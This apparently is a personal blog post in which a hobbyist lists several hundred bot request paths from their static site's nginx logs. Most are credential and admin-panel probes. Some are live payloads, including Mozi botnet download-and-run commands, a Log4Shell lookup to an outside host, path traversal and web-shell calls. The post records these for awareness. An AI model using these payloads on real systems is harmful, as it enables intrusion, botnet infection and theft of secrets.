I checked my nginx server logs and decided it would be nice to show
some examples of some weird bot requests.
No 500 responses by luck :D
Here are near 600 GET requests
/../../../mnt/mtd/Config/Account1
/.DS_Store
/.aws/credentials
/.docker/.env
/.docker/laravel/app/.env
/.env
/.env.backup
/.env.bak
/.env.local
/.env.prod
/.env.prod.local
/.env.production
/.env.production.local
/.env.save
/.git/HEAD
/.git/config
/.git/info/refs?service=git-upload-pack
/.json
/.msmtprc
///ext-js/app/common/zyFunction.js
///remote/fgt_lang?lang=/../../../..//////////dev/
//a2billing/customer/templates/default/footer.tpl
//pv/000000000000.cfg
//pv/spa112.cfg
/188.166.60.136/.env
/1phpmyadmin/index.php?lang=en
/2018/wp-includes/wlwmanifest.xml
/2019/wp-includes/wlwmanifest.xml
/2020/wp-includes/wlwmanifest.xml
/2021/wp-includes/wlwmanifest.xml
/2index.php
/2phpmyadmin/index.php?lang=en
/:443:undefined?id=
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/AjCwLauz69kIB1cMYFdynqXQ7vd
/C2yn
/CSS/Miniweb.css
/DaIfAQ94igNxmKVSYwWnvrjhB6K
/HNAP1
/HNAP1/
/JzsNRtGE7yenY1Qu6fmAvWbOCBe
/MyAdmin/index.php?lang=en
/MyAdmin/scripts/setup.php
/MySQL/scripts/setup.php
/PMA/index.php?lang=en
/Portal/Portal.mwsl
/Portal0000.htm
/QWDp
/ReportServer
/SAAS/auth/login
/SQLite/main.php
/SQLiteManager-1.2.4/main.php
/SQLiteManager/main.php
/SQlite/main.php
/Telerik.Web.UI.WebResource.axd?type=rau
/W17pJ6eUtzfqiFGNja3LmKuwxQ3
/__Additional
/_ignition/execute-solution
/_phpMyAdmin/index.php?lang=en
/_phpmyadmin/index.php?lang=en
/_phpmyadmin/scripts/setup.php
/_phpmyadmin_/index.php?lang=en
/_profiler/phpinfo
/_profiler/phpinfo
/ab2g
/ab2h
/acme-challenge/.env
/acme_challenges/.env
/actuator/gateway/routes
/actuator/health
/admin
/admin-app/.env
/admin.asp
/admin.aspx
/admin.cfm
/admin.cgi
/admin.html
/admin.jhtml
/admin.jsa
/admin.jsp
/admin.php
/admin.pl
/admin.shtml
/admin/
/admin/.env
/admin/db/index.php?lang=en
/admin/index.php?lang=en
/admin/login
/admin/login.php
/admin/phpMyAdmin/index.php?lang=en
/admin/phpmyadmin/index.php?lang=en
/admin/phpmyadmin/scripts/setup.php
/admin/pma/index.php?lang=en
/admin/pma/scripts/setup.php
/admin/scripts/setup.php
/admin/sqladmin/index.php?lang=en
/admin/sysadmin/index.php?lang=en
/admin/web/index.php?lang=en
/administrator/PMA/index.php?lang=en
/administrator/admin/index.php?lang=en
/administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
/administrator/db/index.php?lang=en
/administrator/phpMyAdmin/index.php?lang=en
/administrator/phpmyadmin/index.php?lang=en
/administrator/pma/index.php?lang=en
/administrator/web/index.php?lang=en
/ads.txt
/agSearch/SQlite/main.php
/apache-default/phpmyadmin/scripts/setup.php
/api/.env
/api/geojson?url=file:///etc/hosts
/api/search?folderIds=0
/apiv4?{jndi:ldap://45.92.54.232/github/graphql},
/app/.env
/app/config/.env
/application/.env
/apps/.env
/audio/.env
/auth/login
/autodiscover/[email protected]/owa/?&Email=autodiscover/autodiscover.json%[email protected]
/aws.yml
/backend/.env
/base.asp
/base.aspx
/base.cfm
/base.cgi
/base.html
/base.inc
/base.jhtml
/base.jsa
/base.jsp
/base.php
/base.pl
/base.shtml
/base/.env
/beta/.env
/blog/.env
/blog/phpmyadmin/scripts/setup.php
/blog/wp-includes/wlwmanifest.xml
/blog/wp-login.php
/boaform/admin/formLogin?username=admin&psd=admin
/boaform/admin/formLogin?username=ec8&psd=ec8
/boaform/admin/formLogin?username=user&psd=user
/bootstrap/.env
/c/version.js
/c/version.js
/cdn-cgi/trace
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/.env
/cmd.cgi
/cms/.env
/cms/wp-includes/wlwmanifest.xml
/conf/.env
/config.js
/config.json
/config/.env
/config/aws.yml
/config/getuser?index=0
/config/getuser?index=0
/configuracion/phpmyadmin/scripts/setup.php
/console/
/cookieconv.php
/core/.env
/core/app/.env
/cp/.env
/cpanelphpmyadmin/scripts/setup.php
/cpphpmyadmin/scripts/setup.php
/crm/.env
/dashboard/phpinfo.php
/database/.env
/database/index.php?lang=en
/db/db-admin/index.php?lang=en
/db/dbadmin/index.php?lang=en
/db/dbweb/index.php?lang=en
/db/index.php?lang=en
/db/myadmin/index.php?lang=en
/db/phpMyAdmin-3/index.php?lang=en
/db/phpMyAdmin-4/index.php?lang=en
/db/phpMyAdmin-5/index.php?lang=en
/db/phpMyAdmin/index.php?lang=en
/db/phpMyAdmin3/index.php?lang=en
/db/phpmyadmin/index.php?lang=en
/db/phpmyadmin3/index.php?lang=en
/db/phpmyadmin4/index.php?lang=en
/db/phpmyadmin5/index.php?lang=en
/db/scripts/setup.php
/db/webadmin/index.php?lang=en
/db/webdb/index.php?lang=en
/db/websql/index.php?lang=en
/dbadmin/index.php?lang=en
/dbadmin/scripts/setup.php
/debug/default/view
/debug/default/view.html
/debug/default/view?panel=config
/defau1t.php
/defaul1.php
/default.asp
/default.aspx
/default.cfm
/default.cgi
/default.html
/default.jhtml
/default.jsa
/default.jsp
/default.php
/default.pl
/default.shtml
/development/.env
/doc/.env
/docker/.env
/docker/app/.env
/docs/cplugError.html/
/dotfiles/.env
/dqgqoeCXckuwPtxov
/dqgqoeCXckuwPtxov
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/en/.env
/env.bak
/environments/environment.ts
/evox/about
/evox/about
/files/index.php?file=tf2rghf.jpg
/fjS9
/flu/403.html
/flu/403.html
/forum/phpmyadmin/scripts/setup.php
/frontend/web/debug/default/view
/frontend_dev.php/$
/ghksjdghdfksanitycheckqwerjlhfgjksdghlid
/home.asp
/home.aspx
/home.cfm
/home.cgi
/home.html
/home.jhtml
/home.jsa
/home.jsp
/home.php
/home.pl
/home.shtml
/hudson
/hudson/script
/humans.txt
/idx_config/
/img/background.jpeg
/img/disappointed.jpeg
/index.asp
/index.aspx
/index.cfm
/index.cgi
/index.jhtml
/index.jsa
/index.jsp
/index.php
/index.pl
/index.shtml
/index.term
/indice.asp
/indice.aspx
/indice.cfm
/indice.cgi
/indice.html
/indice.jhtml
/indice.jsa
/indice.jsp
/indice.php
/indice.pl
/indice.shtml
/info.php
/infos.php
/inicio.asp
/inicio.aspx
/inicio.cfm
/inicio.cgi
/inicio.html
/inicio.jhtml
/inicio.jsa
/inicio.jsp
/inicio.php
/inicio.pl
/inicio.shtml
/installer.php
/invoker/readonly
/isadmin.htm
/jenkins/login
/js/.env
/kyc/.env
/laravel/.env
/laravel/core/.env
/leaf.php
/leafmailer.php
/leafmailer2.8(1).php
/leafmailer2.8.php
/lib/.env
/library/.env
/libs/.env
/linusadmin-phpinfo.php
/local/.env
/localstart.asp
/localstart.aspx
/localstart.cfm
/localstart.cgi
/localstart.html
/localstart.jhtml
/localstart.jsa
/localstart.jsp
/localstart.php
/localstart.pl
/localstart.shtml
/login
/login.action
/login.aspx
/login.php
/mF2w
/mail.php
/main.asp
/main.aspx
/main.cfm
/main.cgi
/main.html
/main.jhtml
/main.jsa
/main.jsp
/main.php
/main.pl
/main.shtml
/manager/html
/manager/text/list
/manager/text/list
/media/wp-includes/wlwmanifest.xml
/meetup.xml
/menu.asp
/menu.aspx
/menu.cfm
/menu.cgi
/menu.html
/menu.jhtml
/menu.jsa
/menu.jsp
/menu.php
/menu.pl
/menu.shtml
/myadmin/index.php?lang=en
/myadmin/scripts/setup.php
/mysql-admin/index.php?lang=en
/mysql/admin/index.php?lang=en
/mysql/db/index.php?lang=en
/mysql/dbadmin/index.php?lang=en
/mysql/index.php?lang=en
/mysql/mysqlmanager/index.php?lang=en
/mysql/pMA/index.php?lang=en
/mysql/pma/index.php?lang=en
/mysql/scripts/setup.php
/mysql/sqlmanager/index.php?lang=en
/mysql/web/index.php?lang=en
/mysqladmin/index.php?lang=en
/mysqladmin/scripts/setup.php
/mysqlmanager/index.php?lang=en
/new/.env
/news/wp-includes/wlwmanifest.xml
/newsite/.env
/nmaplowercheck1655213484
/nmaplowercheck1655995522
/nperrin.io/.env
/old/.env
/old_phpinfo.php
/opini%C3%B3n/opinar-ideas-que-importan.html
/owa/auth/logon.aspx
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/owa/auth/x.js
/panel
/personal.xml
/php-info.php
/php-my-admin/index.php?lang=en
/php-my-admin/scripts/setup.php
/php-myadmin/index.php?lang=en
/php/phpmyadmin/scripts/setup.php
/php/scripts/setup.php
/phpMyAdmin-2/scripts/setup.php
/phpMyAdmin-3/index.php?lang=en
/phpMyAdmin-4.9.7/index.php?lang=en
/phpMyAdmin-4/index.php?lang=en
/phpMyAdmin-5.1.0/index.php?lang=en
/phpMyAdmin-5.1.1/index.php?lang=en
/phpMyAdmin-5.1.2/index.php?lang=en
/phpMyAdmin-5.1.3/index.php?lang=en
/phpMyAdmin-5.2.0/index.php?lang=en
/phpMyAdmin-5/index.php?lang=en
/phpMyAdmin/index.php?lang=en
/phpMyAdmin/scripts/setup.php
/phpMyAdmin1/index.php?lang=en
/phpMyAdmin2/index.php?lang=en
/phpMyAdmin3/index.php?lang=en
/phpMyAdmin4/index.php?lang=en
/phpMyAdmin5.1/index.php?lang=en
/phpMyAdmin5.2/index.php?lang=en
/phpMyAdmin5/index.php?lang=en
/phpMyAdmin_/index.php?lang=en
/phpMyadmin/index.php?lang=en
/phpadmin/scripts/setup.php
/phpinfo
/phpinfo.php
/phpmy-admin/index.php?lang=en
/phpmy/index.php?lang=en
/phpmy/scripts/setup.php
/phpmyAdmin/index.php?lang=en
/phpmyadmin/
/phpmyadmin/index.php
/phpmyadmin/index.php?lang=en
/phpmyadmin/scripts/setup.php
/phpmyadmin1/index.php?lang=en
/phpmyadmin2/index.php?lang=en
/phpmyadmin2011/index.php?lang=en
/phpmyadmin2012/index.php?lang=en
/phpmyadmin2013/index.php?lang=en
/phpmyadmin2014/index.php?lang=en
/phpmyadmin2015/index.php?lang=en
/phpmyadmin2016/index.php?lang=en
/phpmyadmin2017/index.php?lang=en
/phpmyadmin2018/index.php?lang=en
/phpmyadmin2019/index.php?lang=en
/phpmyadmin2020/index.php?lang=en
/phpmyadmin2021/index.php?lang=en
/phpmyadmin2022/index.php?lang=en
/phpmyadmin3/index.php?lang=en
/phpmyadmin4.8.5/index.php
/phpmyadmin4/index.php?lang=en
/phpmyadmin5/index.php?lang=en
/phpmyadmin_/index.php?lang=en
/phpmyadmin_/scripts/setup.php
/phppma/index.php?lang=en
/pma/index.php?lang=en
/pma/scripts/setup.php
/pmd/index.php
/pools
/pools/default/buckets
/portal/redlion
/preview.php?/albums/&preview=elementary/a:<?=print(43543534534-567567567);?>
/private/.env
/prod/.env
/program/index.php?lang=en
/protected/.env
/pub/.env
/public/.env
/pv/000000000000.cfg
/pv/spa112.cfg
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/remote/login
/robots.txt
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s3cmd.ini
/sapi/debug/default/view
/script
/script
/script/.env
/scripts/setup.php
/send.php
/sender.php
/server-status
/servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.184.109:41501/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
/shared/.env
/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/shop/wp-includes/wlwmanifest.xml
/shopdb/index.php?lang=en
/site/.env
/site/wp-includes/wlwmanifest.xml
/sites/.env
/sites/all/libraries/mailchimp/.env
/sites/all/libraries/plupload/examples/upload.php
/sito/wp-includes/wlwmanifest.xml
/solr/admin/info/system?wt=json
/sql/myadmin/index.php?lang=en
/sql/php-myadmin/index.php?lang=en
/sql/phpMyAdmin/index.php?lang=en
/sql/phpMyAdmin2/index.php?lang=en
/sql/phpmanager/index.php?lang=en
/sql/phpmy-admin/index.php?lang=en
/sql/phpmyadmin3/index.php?lang=en
/sql/phpmyadmin4/index.php?lang=en
/sql/phpmyadmin5/index.php?lang=en
/sql/sql-admin/index.php?lang=en
/sql/sql/index.php?lang=en
/sql/sqladmin/index.php?lang=en
/sql/sqlweb/index.php?lang=en
/sql/webadmin/index.php?lang=en
/sql/webdb/index.php?lang=en
/sql/websql/index.php?lang=en
/sqlite/main.php
/sqlitemanager/main.php
/sqlmanager/index.php?lang=en
/src/.env
/src/environments/environment.ts
/stalker_portal/c/version.js
/stalker_portal/c/version.js
/stalker_portal/server/tools/auth_simple.php
/start.asp
/start.aspx
/start.cfm
/start.cgi
/start.html
/start.jhtml
/start.jsa
/start.jsp
/start.php
/start.pl
/start.shtml
/storage/.env
/stream/live.php
/stream/live.php
/streaming/clients_live.php
/streaming/clients_live.php
/style.php?sig=rename
/system_api.php
/system_api.php
/tech.xml
/telescope/requests
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php
/test/wp-includes/wlwmanifest.xml
/tokenlite_app/.env
/tomcatwar.jsp
/tomcatwar.jsp?pwd=j&cmd=id
/tool/view/phpinfo.view.php
/typo3/phpmyadmin/scripts/setup.php
/ui/vropspluginui/rest/services/getstatus
/update/v32/default
/users/sign_in
/v2/_catalog
/vendor/.env
/vendor/laravel/.env
/vendor/phpunit/phpunit/phpunit.xml
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/version
/w00tw00t.at.blackhats.romanian.anti-sec:)
/web/debug/default/view
/web/phpMyAdmin/scripts/setup.php
/web/scripts/setup.php
/web/wp-includes/wlwmanifest.xml
/weblogin.htm
/website/wp-includes/wlwmanifest.xml
/websql/scripts/setup.php
/wikindex.php
/wordpress/wp-includes/wlwmanifest.xml
/wordpress/wp-login.php
/wp-admin/.env
/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin
/wp-admin/leafmailer2.8.php
/wp-config.php-backup
/wp-content/.env
/wp-content/leafmailer2.8.php
/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css
/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php
/wp-content/plugins/jquery-html5-file-upload/readme.txt
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/wp-includes/ID3/license.txt
/wp-includes/leafmailer2.8.php
/wp-includes/wlwmanifest.xml
/wp-login.php
/wp-phpmyadmin/phpmyadmin/scripts/setup.php
/wp/wp-includes/wlwmanifest.xml
/wp/wp-login.php
/wp1/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/www/.env
/xampp/phpmyadmin/scripts/setup.php
/xmlrpc.php?rsd
/~phpmyadmin/scripts/setup.php
/default.asp
Some requests might be part of some protocol I’m don’t know, and
maybe I missed something filtering the requests, but I think the
majority are exploits for PHP, Wordpress and bad configured proxy
servers.
Then some POST requests
/
/.env.prod
/.env.production
/.env.save
/51028231
/Autodiscover/Autodiscover.xml
/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7
/GponForm/diag_Form?images/
/HNAP1/
/_ignition/execute-solution
/admin-app/.env
/ajax
/boaform/admin/formLogin
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/index2.asp
/cms/.env
/core/.env
/core/.env
/development/.env
/editBlackAndWhiteList
/index.htm
/index.html/sfNqUd38H96GleCQVQ2c82GHeK21ZaE.srv
/local/.env
/mgmt/tm/util/bash
/mifs/.;/services/LogService
/private/.env
/script/.env
/scripts/WPnBr.dll
/sdk
/shared/.env
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
This is just a static website… Maybe this goes to show that good
monitoring is also for hobbyist projects.